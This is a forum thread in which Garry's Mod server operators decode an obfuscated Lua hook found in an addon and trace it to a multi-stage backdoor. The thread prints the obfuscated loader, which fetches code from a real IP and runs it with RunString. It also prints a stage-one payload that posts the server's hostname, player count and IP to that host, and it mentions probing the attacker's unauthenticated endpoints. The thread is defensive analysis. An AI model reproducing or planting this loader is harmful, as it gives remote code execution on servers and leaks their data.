Need help with de-obfuscating this hook

So I’m doing a job for someone and one of their addons on the server has this hook:



hook.Add("\84\104\105\110\107","\67\67\67", function()  RunString("function util.ABCDEFGEEZGEEGZGE( data ) local  b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/' if  !data then return end data = string.gsub(data, '[^'..b..'=]', '') return  (data:gsub('.', function(x) if (x == '=') then return '' end local  r,f='',(b:find(x)-1) for i=6,1,-1 do r=r..(f%2^i-f%2^(i-1)>0  && '1' || '0') end return r; end):gsub('%d%d%d?%d?%d?%d?%d?%d?',  function(x) if (#x ~= 8) then return '' end local c=0 for i=1,8 do  c=c+(x:sub(i,i)=='1' && 2^(8-i) || 0) end return string.char(c)  end)) end  http.Fetch(string.reverse(util.ABCDEFGEEZGEEGZGE('cGhwLjFlZ2F0cy9lcm9jL3VlZnVhY2FyZC8wOC4xMzIuNDcuNzMxLy86cHR0aA=')),function(body,len,headers,code)  RunString(body) end)") 
 hook.Remove("\84\104\105\110\107","\67\67\67") end)

Can anyone help me find out what this is? It looks suspicious as shit

could it be, that it’s inside sh_blockbelier.lua?
i’ve seen the name util.ABCDEFGEEZGEEGZGE once and then it was an payload from an french PrisonRP Server.
first it loaded an second resolve function for stage 2, collected playercount, ip and hostname and then it just resovled to an empty print. Just comment it out and if the addon still works, up you go.

I’ll take a crack at it.

So far I’ve got:
[lua]
local code = [[
function util.ABCDEFGEEZGEEGZGE( data )
local b=‘ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/’
if !data then return end

data = string.gsub( data, '[^'..b..'=]', '' )
return ( data:gsub( '.', function( x )
	if ( x == '=' ) then return '' end
	local r, f='', ( b:find( x )-1 )
	for i=6, 1, -1 do
		r=r..( f%2^i-f%2^( i-1 )>0 && '1' || '0' )
	end
	return r;
end ):gsub( '%d%d%d?%d?%d?%d?%d?%d?', function( x )
	if ( #x ~= 8 ) then return '' end
	local c=0 for i=1, 8 do
		c = c+( x:sub( i, i ) == '1' && 2^( 8-i ) || 0 )
	end
	return string.char( c ) end ) )

end

http.Fetch( string.reverse( util.ABCDEFGEEZGEEGZGE( 'cGhwLjFlZ2F0cy9lcm9jL3VlZnVhY2FyZC8wOC4xMzIuNDcuNzMxLy86cHR0aA=' ) ), function( body, len, headers, code )
	RunString( body )
end )

]]

hook.Add(“Think”, “CCC”, function()
RunString(code)
hook.Remove(“Think”, “CCC”)
end)
[/lua]

All it’s doing is hiding the URL really. Here, I’ll grab the URL by running the function now

[editline]a[/editline]

http://137.74.231.80/dracaufeu/core/stage1.php

Yeah it still works without the hook but this is more a curiosity thing.

I remember way back there used to be code similar to this in some workshop addon that collected data to find out who’s using the addon

eventually does this



http.Fetch( "http://137.74.231.80/dracaufeu/core/stage1.php", function( body, len, headers, code )
    RunString( body )
end )


Appreciate it guys

[editline]6th August 2016[/editline]

So it is running code through the http, huh

Multistaged as well

[editline]6th August 2016[/editline]



// Stage One
timer.Create( "LaunchGet", 23, 0, function() local a = { n = GetHostName(), nb = tostring(#player.GetAll()), i = game.GetIPAddress() } http.Post( "http://137.74.231.80/dracaufeu/core/stage2.php", a, function( body, len, headers, code ) RunString(body) end) end) 



He didn’t add a second stage, guess that would have been eventually

Is it possible that it only serves the second stage if the parameters are valid?

After reading the stages, i believe it’s meant to be a thing where he makes specific hacks for a given IP address

[editline]6th August 2016[/editline]

eg, give community 1 this hack, community 2 this one, etc

When served valid parameters (specifically a = { n = “Eat my ass.”, nb = “999”, i = “127.0.0.1” }), server responds with “PrintMessage(10,’’)”.

Interedasting http://137.74.231.80/dracaufeu/core/

http://137.74.231.80/dracaufeu/core/ajax/error_log

Out of curiosity how do you guys decode these sorts of things? At best google shows me it’s a bytecode but I’m not actually sure what to do with that

Started by figuring out the hook names, you can just print the string to get the unescaped values. Then I formatted the code block, and realized i didn’t need to understand it to get the URL; I just fed the function into lua and instead of http.Fetch i print()'d it

[editline]6th August 2016[/editline]

This is god tier. I’m guessing he posts to those files to create and remove payloads. I bet he doesn’t auth either.

Seems to use a database to store payloads?

What do you want to bet it’s secured correctly?

This isn’t from a ScriptFodder addon is it?
Seems dodgy as shit and I have seen other DRM type code very similar to this one (Bus System - ElGringo) get removed because of it.

LMAO he doesn’t auth

god-tier copy+paste detected

>Redirect to BaguetteRP

looks like we cracked the mystery; a frenchie has compromised some servers

It’s not from an SF addon no, it’s from a privately made addon that someone had “full permission to post publically”

Main server file had this in it, had a feeling it was no good, and look at that.

:snip:

[editline]aww[/editline]

Update: server is closed :frowning:
Which one of you told him? Or does he monitor his server 24/7…